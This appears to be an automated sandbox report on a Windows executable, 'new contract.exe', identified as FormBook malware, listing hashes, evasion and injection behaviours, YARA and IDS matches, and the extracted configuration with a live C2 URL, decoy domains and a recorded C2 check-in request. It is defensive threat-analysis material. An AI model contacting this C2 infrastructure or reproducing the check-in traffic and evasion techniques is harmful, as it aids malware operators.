Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
new contract.exe

Overview

General Information

Sample name:new contract.exe
Analysis ID:1531093
MD5:c6b38036b68ea21306e8814ab1b1b4d9
SHA1:6b1ee982b77f2274ff6844f06706f13418dc6aa0
SHA256:732336eccda1e0e01a9474a968eb6ac9725fec8e8e03ad950472df75ba470693
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Uses netstat to query active network connections and open ports
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • new contract.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\new contract.exe" MD5: C6B38036B68EA21306E8814AB1B1B4D9)
    • new contract.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\new contract.exe" MD5: C6B38036B68EA21306E8814AB1B1B4D9)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autofmt.exe (PID: 7724 cmdline: "C:\Windows\SysWOW64\autofmt.exe" MD5: C72D80A976B7EB40534E8464957A979F)
        • NETSTAT.EXE (PID: 7732 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)
          • cmd.exe (PID: 7788 cmdline: /c del "C:\Users\user\Desktop\new contract.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.aycare-service-99683.bond/c89p/"], "decoy": ["ftersaleb.top", "dcustomdesgins.net", "ostbet2024.live", "rhgtrdjdjytkyhretrdjfytd.buzz", "atauniversity.tech", "idoctor365.net", "x-design-courses-29670.bond", "ellowold-pc.top", "ransportationmmsytpro.top", "areerfest.xyz", "artiresbah-in.today", "ijie.pro", "torehousestudio.info", "69-11-luxury-watches.shop", "earing-tests-44243.bond", "hits.shop", "hzl9.bond", "lood-test-jp-1.bond", "livialiving.online", "usymomsmakingmoney.online", "olar-systems-panels-61747.bond", "hinawinner.top", "oldensky10.xyz", "oginsuperking777.click", "oviepicker.net", "partment-rental05.online", "ldkp.net", "sofaerb.shop", "ydh5.beauty", "aston-saaaa.buzz", "acuum-cleaner-84018.bond", "usiness-printer-37559.bond", "dindadisini12.click", "j7zd12m.xyz", "plesacv.xyz", "trustcapital247.online", "asapembuatanpatung.online", "ent-all.xyz", "r64mh1.vip", "aser-cap-hair-growth.today", "amattva.company", "herightfits.top", "uickautoquote.net", "ctu36ojboz6w2cl.asia", "oursmile.vip", "astysavor.website", "iam-saaab.buzz", "igmoto.info", "itchellcohen.net", "un-sea.fun", "steticavonixx.shop", "arklife.shop", "bsboffchatrussummsa.online", "iuxing.asia", "okenexchange.art", "llhealthreview.online", "refabricated-homes-53685.bond", "atercraze.net", "osmits.net", "rail.cruises", "utanginamo.sbs", "hapanda.fun", "arehouse-inventory-29693.bond", "innivip.bio"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.new contract.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.new contract.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.new contract.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          2.2.new contract.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.new contract.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-10T21:06:44.004230+020020314531Malware Command and Control Activity Detected192.168.2.44997989.31.143.9080TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.aycare-service-99683.bond/c89p/"], "decoy": ["ftersaleb.top", "dcustomdesgins.net", "ostbet2024.live", "rhgtrdjdjytkyhretrdjfytd.buzz", "atauniversity.tech", "idoctor365.net", "x-design-courses-29670.bond", "ellowold-pc.top", "ransportationmmsytpro.top", "areerfest.xyz", "artiresbah-in.today", "ijie.pro", "torehousestudio.info", "69-11-luxury-watches.shop", "earing-tests-44243.bond", "hits.shop", "hzl9.bond", "lood-test-jp-1.bond", "livialiving.online", "usymomsmakingmoney.online", "olar-systems-panels-61747.bond", "hinawinner.top", "oldensky10.xyz", "oginsuperking777.click", "oviepicker.net", "partment-rental05.online", "ldkp.net", "sofaerb.shop", "ydh5.beauty", "aston-saaaa.buzz", "acuum-cleaner-84018.bond", "usiness-printer-37559.bond", "dindadisini12.click", "j7zd12m.xyz", "plesacv.xyz", "trustcapital247.online", "asapembuatanpatung.online", "ent-all.xyz", "r64mh1.vip", "aser-cap-hair-growth.today", "amattva.company", "herightfits.top", "uickautoquote.net", "ctu36ojboz6w2cl.asia", "oursmile.vip", "astysavor.website", "iam-saaab.buzz", "igmoto.info", "itchellcohen.net", "un-sea.fun", "steticavonixx.shop", "arklife.shop", "bsboffchatrussummsa.online", "iuxing.asia", "okenexchange.art", "llhealthreview.online", "refabricated-homes-53685.bond", "atercraze.net", "osmits.net", "rail.cruises", "utanginamo.sbs", "hapanda.fun", "arehouse-inventory-29693.bond", "innivip.bio"]}
          Multi AV Scanner detection for submitted file
          Source: new contract.exeReversingLabs: Detection: 50%
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: new contract.exeJoe Sandbox ML: detected
          Source: new contract.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: new contract.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: netstat.pdbGCTL source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp, new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp, new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: new contract.exe, 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1808242227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1806702400.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: new contract.exe, new contract.exe, 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000003.1808242227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1806702400.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49979 -> 89.31.143.90:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49979 -> 89.31.143.90:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49979 -> 89.31.143.90:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.aycare-service-99683.bond/c89p/
          Tries to resolve many domain names, but no domain seems valid
          Source: unknownDNS traffic detected: query: www.uickautoquote.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.aser-cap-hair-growth.today replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.livialiving.online replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.innivip.bio replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.arklife.shop replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.sofaerb.shop replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.r64mh1.vip replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ldkp.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.aycare-service-99683.bond replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.olar-systems-panels-61747.bond replaycode: Name error (3)
          Uses netstat to query active network connections and open ports
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
          Source: global trafficHTTP traffic detected: GET /c89p/?ohUpTpT0=uK/A8O6Hj9VReqQKS0ATE3Xrf7RWVy6yiEUunzdvsHMfMNs/vPJv/pK5tSC7SJ1XhvpN&BZL00t=YrClV4dXu8Ftc4cp HTTP/1.1Host: www.igmoto.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 89.31.143.90 89.31.143.90
          Source: Joe Sandbox ViewIP Address: 89.31.143.90 89.31.143.90
          Source: Joe Sandbox ViewASN Name: QSC-AG-IPXDE QSC-AG-IPXDE
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4E3F82 getaddrinfo,setsockopt,recv,3_2_0E4E3F82
          Source: global trafficHTTP traffic detected: GET /c89p/?ohUpTpT0=uK/A8O6Hj9VReqQKS0ATE3Xrf7RWVy6yiEUunzdvsHMfMNs/vPJv/pK5tSC7SJ1XhvpN&BZL00t=YrClV4dXu8Ftc4cp HTTP/1.1Host: www.igmoto.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.livialiving.online
          Source: global trafficDNS traffic detected: DNS query: www.innivip.bio
          Source: global trafficDNS traffic detected: DNS query: www.aser-cap-hair-growth.today
          Source: global trafficDNS traffic detected: DNS query: www.igmoto.info
          Source: global trafficDNS traffic detected: DNS query: www.olar-systems-panels-61747.bond
          Source: global trafficDNS traffic detected: DNS query: www.arklife.shop
          Source: global trafficDNS traffic detected: DNS query: www.sofaerb.shop
          Source: global trafficDNS traffic detected: DNS query: www.uickautoquote.net
          Source: global trafficDNS traffic detected: DNS query: www.ldkp.net
          Source: global trafficDNS traffic detected: DNS query: www.r64mh1.vip
          Source: global trafficDNS traffic detected: DNS query: www.aycare-service-99683.bond
          Source: explorer.exe, 00000003.00000003.3108632093.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000003.3108632093.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000003.3108632093.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000003.3108632093.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000000.1745295797.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3484154679.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000003.00000000.1745295797.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3484154679.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: explorer.exe, 00000003.00000000.1755546236.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4136528142.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1749262863.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arklife.shop
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arklife.shop/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arklife.shop/c89p/www.sofaerb.shop
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arklife.shopReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aser-cap-hair-growth.today
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aser-cap-hair-growth.today/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aser-cap-hair-growth.today/c89p/www.igmoto.info
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aser-cap-hair-growth.todayReferer:
          Source: explorer.exe, 00000003.00000000.1745295797.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aycare-service-99683.bond
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aycare-service-99683.bond/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aycare-service-99683.bond/c89p/www.x-design-courses-29670.bond
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aycare-service-99683.bondReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
